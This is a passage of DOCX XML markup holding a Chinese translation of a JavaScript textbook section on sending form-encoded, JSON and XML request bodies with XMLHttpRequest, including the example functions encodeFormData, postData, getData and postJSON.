        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法提交这种顺序的表单数据时，必须设置</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>请求头为这个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这种类型的编码并不需要</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单，在本章我们实际上将不需要直接使用表单。在</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>应用中，你希望发送给服务器的很可能是一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象。（这个对象可能从</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单的用户输入中得到，但这里不是问题。）前面展示的数据变成</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的表单编码形式可能是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>find:"pizza",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>zipcode:02134,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>radius:"1km"</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表单编码在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>上如此广泛使用，同时所有服务器端的编程语言都能得到良好的支持，所以非表单数据的表单编码通常也是容易实现的事情。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-4</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何实现对象属性的表单编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-4</w:t>
      </w:r>
      <w:r>
        <w:t>：用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的编码对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>编码对象的属性，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果它们是来自</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对，使用</w:t>
      </w:r>
      <w:r>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:t>格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function encodeFormData(data){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!data)ret</w:t>
      </w:r>
      <w:r>
        <w:t>urn"";//</w:t>
      </w:r>
      <w:r>
        <w:t>一直返回字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pairs=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>为了保存名</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var name in data){//</w:t>
      </w:r>
      <w:r>
        <w:t>为每个名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!data.hasOwnProperty(name))continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过继承属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof data[name]==="function")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=data[name].toString();//</w:t>
      </w:r>
      <w:r>
        <w:t>把值转换成字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=encodeURIComponent(name.replace("%20","+</w:t>
      </w:r>
      <w:r>
        <w:t>"));//</w:t>
      </w:r>
      <w:r>
        <w:t>编码名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value=encodeURIComponent(value.replace("%20","+"));//</w:t>
      </w:r>
      <w:r>
        <w:t>编码值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pairs.push(name+"="+value);//</w:t>
      </w:r>
      <w:r>
        <w:t>记住名</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return pairs.join('</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>');//</w:t>
      </w:r>
      <w:r>
        <w:t>返回使用</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>连接的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</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使用已定义的</w:t>
      </w:r>
      <w:r>
        <w:t>encodeFormData()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，我们能容易地写出像例</w:t>
      </w:r>
      <w:r>
        <w:t>18-5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>postData()</w:t>
      </w:r>
      <w:r>
        <w:t>函数这样的工具函数。需要注意的是，简单来说，</w:t>
      </w:r>
      <w:r>
        <w:t>postData()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（在随后的示例中有相似的函数）不能处理服务器的响应。当响应完成，它传递整个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象给指定的回调函数。这个回调函数负责检查响应状态码和提取响应文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-5</w:t>
      </w:r>
      <w:r>
        <w:t>：使用表单编码数据发起一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function postData(url,data,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new X</w:t>
      </w:r>
      <w:r>
        <w:t>MLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("POST",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>对指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发生</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>简单的事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>callback)//</w:t>
      </w:r>
      <w:r>
        <w:t>当响应完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.setRequestHeader("Content-Type",//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"application/x-w</w:t>
      </w:r>
      <w:r>
        <w:t>ww-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(encodeFormData(data));//</w:t>
      </w:r>
      <w:r>
        <w:t>发送表单编码的数据</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表单数据同样可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求来提交，既然表单提交的目的是为了执行只读查询，因此</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求比</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求更合适。（当提交表单的目标仅仅是一个只读查询，</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>更合适。）</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求从来没有主体，所以需要发送给服务器的表单编码数据</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>负载</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>要作为</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（后跟一个问号）的查询部分。</w:t>
      </w:r>
      <w:r>
        <w:t>encodeFormData()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数也能用于这种</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，且例</w:t>
      </w:r>
      <w:r>
        <w:t>18-6</w:t>
      </w:r>
      <w:r>
        <w:t>演示了如何</w:t>
      </w:r>
      <w:r>
        <w:t>使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-6</w:t>
      </w:r>
      <w:r>
        <w:t>：使用表单编码数据发起</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getData(url,data,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("GET",url+//</w:t>
      </w:r>
      <w:r>
        <w:t>通过添加的编码数据获取指定的</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"?"+encodeFormData(data));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>简单事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>callback)callback(request);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>发送请求</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HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单在提交的时候会对表单数据进行</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>编码，但使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>能给我们编码自己想要的任何数据。随着服务器上的适当支持，我们的</w:t>
      </w:r>
      <w:r>
        <w:t>pizza</w:t>
      </w:r>
      <w:r>
        <w:t>查询数据将编码成一个更清晰的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://restaurantfinder.example.com/02134/1km/pizza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体中使用表单编码是常见惯例，但在任何情况下它都不是</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议的必需品。近年来，作为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>交换格式的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>已经得到普及。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）编码请求主体。注意这个示例和例</w:t>
      </w:r>
      <w:r>
        <w:t>18-5</w:t>
      </w:r>
      <w:r>
        <w:t>的不同仅在最后两行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-7</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码主体来发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function postJSON(url,data,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("POST</w:t>
      </w:r>
      <w:r>
        <w:t>",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>对指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>简单的事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>callback)//</w:t>
      </w:r>
      <w:r>
        <w:t>当响应完成时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.setRequestHeader("Content-Type","application/json");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(JSON.stringify(data));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.XML</w:t>
      </w:r>
      <w:r>
        <w:t>编码</w:t>
      </w:r>
      <w:r>
        <w:t>的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>有时也用于数据传输的编码。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的用表单编码或</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码版本表达的</w:t>
      </w:r>
      <w:r>
        <w:t>pizza</w:t>
      </w:r>
      <w:r>
        <w:t>查询，也能用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来表示它。例如，它看起来如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>find zipcode="02134"radius="1km"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pizza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/find</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/query</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在目前展示的所有示例中，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的参数是一个字符串或</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。实际上，可以在这里传入</w:t>
      </w:r>
      <w:r>
        <w:t>XML Document</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-8</w:t>
      </w:r>
      <w:r>
        <w:t>展示如何创建一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象并使用它作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
